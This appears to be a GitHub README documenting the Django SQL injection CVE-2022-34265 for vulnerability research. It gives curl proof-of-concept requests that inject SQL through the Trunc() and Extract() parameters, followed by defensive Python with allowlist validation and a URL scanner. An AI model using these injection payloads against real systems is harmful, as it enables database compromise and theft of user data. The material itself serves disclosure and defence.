yoryio / django-vuln-research

Collection of Django CVEs with PoCs

Repository from GitHub: https://github.com/yoryio/django-vuln-research

Django Vulnerability Research

Vulnerabilities

CVE-2022-34265

  • CWE-89: Improper Neutralization of Special Elements used in an SQL Command
  • CVSS: 9.8 CRITICAL
  • EPSS: 0.54%

Cause

  • SQL injection caused by improper neutralization of special elements in the values passed through the following function arguments:
    • Trunc() - kind
    • Extract() - lookup_name

Impact

  • Complete compromise of user information

Commit

PoC

# Normal URL
curl "http://localhost:4131/extract/?lookup_name=year"
curl "http://localhost:4131/trunc/?kind=year"

# URL where the database instruction can be executed
curl "http://localhost:4131/extract/?lookup_name=year%27%20FROM%20start_datetime))%20OR%201=1;SELECT%20PG_SLEEP(5)--"
curl "http://localhost:4131/trunc/?kind=year%27,%20start_datetime))%20OR%201=1;SELECT%20PG_SLEEP(5)--"

  • Discovered by Takuto Yoshikai (Aeye Security Lab)
  • Please check the following GitHub repository for more information: CVE-2022-34265
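The following is an added example, not code from the yoryio repository or from Django itself. It shows the two defensive checks a practitioner would want against this bug class: an allowlist that a view applies to the `kind` and `lookup_name` request parameters before they ever reach `Trunc()` or `Extract()`, and a small scanner that flags request URLs whose `kind`/`lookup_name` values contain characters a legitimate value never has, run here over the PoC URLs from this page. The allowlists are my assumption of the documented Extract lookups and Trunc kinds and are not Django's own validation code; `InvalidLookup`, `scan_request` and the two `safe_*` helpers are names chosen for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed allowlists (this example's own, not Django's validation logic):
# the documented Extract() lookup names and Trunc() kinds. Anything not in
# these sets is rejected before it can reach the ORM and be spliced into SQL.
EXTRACT_LOOKUPS = frozenset({
    "year", "iso_year", "quarter", "month", "week", "week_day",
    "iso_week_day", "day", "hour", "minute", "second",
})
TRUNC_KINDS = frozenset({
    "year", "quarter", "month", "week", "day",
    "hour", "minute", "second", "date", "time",
})


class InvalidLookup(ValueError):
    """Raised when a request supplies a kind/lookup_name outside the allowlist."""


def _validate_choice(value, allowed, param):
    # Exact-match allowlisting: no normalisation, no partial matches, so a
    # value such as "year' FROM ..." can never be accepted.
    if not isinstance(value, str) or value not in allowed:
        raise InvalidLookup(f"rejected {param}={value!r}")
    return value


def safe_extract_lookup(lookup_name):
    """Return lookup_name if it is a known Extract() lookup, else raise."""
    return _validate_choice(lookup_name, EXTRACT_LOOKUPS, "lookup_name")


def safe_trunc_kind(kind):
    """Return kind if it is a known Trunc() kind, else raise."""
    return _validate_choice(kind, TRUNC_KINDS, "kind")


# Detection side: a legitimate kind/lookup_name consists only of letters and
# underscores, so any other character (quote, space, parenthesis, semicolon,
# comment marker) in those parameters is worth an alert.
_SUSPECT = re.compile(r"[^A-Za-z_]")


def scan_request(url):
    """Return [(param, decoded_value), ...] for suspicious kind/lookup_name values in a URL."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    findings = []
    for param in ("lookup_name", "kind"):
        for value in query.get(param, []):
            if _SUSPECT.search(value):
                findings.append((param, value))
    return findings


if __name__ == "__main__":
    # Constructed sample: the normal and the injected URLs from the PoC above.
    sample_urls = [
        "http://localhost:4131/extract/?lookup_name=year",
        "http://localhost:4131/trunc/?kind=year",
        "http://localhost:4131/extract/?lookup_name=year%27%20FROM%20start_datetime))%20OR%201=1;SELECT%20PG_SLEEP(5)--",
        "http://localhost:4131/trunc/?kind=year%27,%20start_datetime))%20OR%201=1;SELECT%20PG_SLEEP(5)--",
    ]
    for url in sample_urls:
        print(url, "->", scan_request(url) or "clean")

    # The allowlist stops the same payload at the view boundary.
    for candidate in ("year", "year', start_datetime)) OR 1=1"):
        try:
            print("accepted kind:", safe_trunc_kind(candidate))
        except InvalidLookup as exc:
            print("blocked:", exc)
```

In a Django view this means calling `safe_trunc_kind(request.GET["kind"])` (and the Extract counterpart) and returning a 400 on `InvalidLookup`, so the ORM only ever sees a value from the fixed set; the scanner is the same predicate applied to access-log URLs after the fact.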

Resources
